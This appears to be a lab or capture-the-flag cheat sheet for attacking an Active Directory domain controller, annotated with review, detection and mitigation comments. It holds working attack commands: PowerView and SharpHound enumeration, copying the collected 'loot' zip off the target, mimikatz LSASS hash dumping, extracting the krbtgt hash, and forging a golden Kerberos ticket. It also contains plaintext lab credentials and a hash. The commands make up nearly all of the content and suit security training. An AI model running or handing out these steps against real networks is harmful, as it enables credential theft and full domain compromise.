=================================
10.201.116.9 -- domain.com -- win/lin x32/x64
=================================
# Lab setup: connect to the lab VPN, then record the target IP for the rest of the session.
# `vpn-connect` is presumably a local helper/alias rather than a standard tool — confirm it exists.
vpn-connect
# NOTE(review): this appends a fresh `export` line on every run, so ~/.zshrc accumulates
# duplicate TARGET entries; `source ~/.zshrc` only affects the calling shell, so these
# lines are meant to be run interactively, not from a script.
echo 'export TARGET=10.201.116.9' >> ~/.zshrc && source ~/.zshrc
# Map the lab hostname to the target so later commands can refer to CONTROLLER by name.
# `tee -a` appends; rerunning produces duplicate /etc/hosts entries as well.
echo "$TARGET CONTROLLER" | sudo tee -a /etc/hosts
Your machine IP is 10.201.116.9
Username: Administrator
Password: P@$$W0rd
Domain Name: CONTROLLER
# SSH to the target as the lab-supplied account. The password is single-quoted so the
# shell does not expand `$$`. Two properties of this form worth knowing:
#   - the password is passed on argv, so it is visible in `ps` output and shell history;
#   - StrictHostKeyChecking=no together with UserKnownHostsFile=/dev/null disables host-key
#     verification, so a substituted host would not be detected (a lab-only trade-off).
# $TARGET is unquoted; harmless for a bare IP, but "$TARGET" is the conventional form.
sshpass -p 'P@$$W0rd' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 Administrator@$TARGET
---
# https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# PowerView reference (above). These lines run on the target, inside the SSH session.
# `-ep bypass` starts a PowerShell session with ExecutionPolicy=Bypass so the unsigned
# script can be dot-sourced; execution policy is not a security boundary, so this does
# not change privileges.
powershell -ep bypass
# Dot-source the script so its functions are loaded into the current session.
. .\Downloads\PowerView.ps1
# List domain users, common name only.
Get-NetUser | select cn
# List groups whose name contains "admin".
Get-NetGroup -GroupName *admin*
# Defensive note: these cmdlets query Active Directory over LDAP, so the enumeration is
# visible in domain-controller LDAP / Directory Service logging where that is enabled.
---
# On the target: load SharpHound and collect BloodHound data for the lab domain.
powershell -ep bypass
. .\Downloads\SharpHound.ps1
# -CollectionMethod All gathers every collector type into one zip. Defensive note: this
# scope typically touches every domain host (session/local-group enumeration), which is
# why it is noisy and commonly alerted on.
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
# Run from the attacking machine, not inside the PowerShell session. SharpHound prefixes
# the zip name with a timestamp (compare -ZipFileName loot.zip above with the name pulled
# here), so this filename has to match the actual run. Same argv-password and disabled
# host-key-check caveats as the ssh command earlier in this file.
sshpass -p 'P@$$W0rd' scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null Administrator@$TARGET:20251024114727_loot.zip .
# Upload zipfile to Bloodhound
# http://127.0.0.1:8080/ui/login
# Compiled-binary equivalent of the Invoke-Bloodhound call above (same collection scope).
.\SharpHound.exe -c All -d CONTROLLER.local --zipfilename loot_exe.zip
# unzip and upload to Bloodhound
# http://127.0.0.1:8080/ui/administration/file-ingest
---
# On the target: start mimikatz from the Downloads folder.
cd Downloads
.\mimikatz.exe
# The remaining lines are typed at the interactive mimikatz prompt, not in PowerShell.
# Request SeDebugPrivilege so mimikatz can read LSASS memory.
privilege::debug
# Dump Hashes
# Detection note: reading LSASS from a non-system process is exactly what LSA protection /
# Credential Guard and EDR LSASS-access alerts are designed to block or flag.
lsadump::lsa /patch
# Golden Ticket
# Retrieve the krbtgt account's hash; it is the value used in /krbtgt: below.
lsadump::lsa /inject /name:krbtgt
# Forge a TGT for Administrator (RID 500) from the domain SID and the krbtgt hash above.
# Mitigation note: a forged ticket stays valid until the krbtgt password has been reset
# twice, because the KDC also accepts tickets signed with the previous key.
kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
# Open a command prompt from within mimikatz.
misc::cmd
# open other command prompt to access other machines
---
# RDP to the target from the attacking machine, sharing the local mimikatz directory into
# the session as `share`. Caveats in this form: the password is on argv (visible in
# `ps`/history) and /cert:ignore accepts any server certificate, so the TLS layer cannot
# detect a substituted host. $TARGET is unquoted; fine for a bare IP, "$TARGET" by convention.
xfreerdp3 /clipboard /dynamic-resolution /cert:ignore /v:$TARGET /u:Administrator /p:'P@$$W0rd' /drive:'/usr/share/windows-resources/mimikatz/x64',share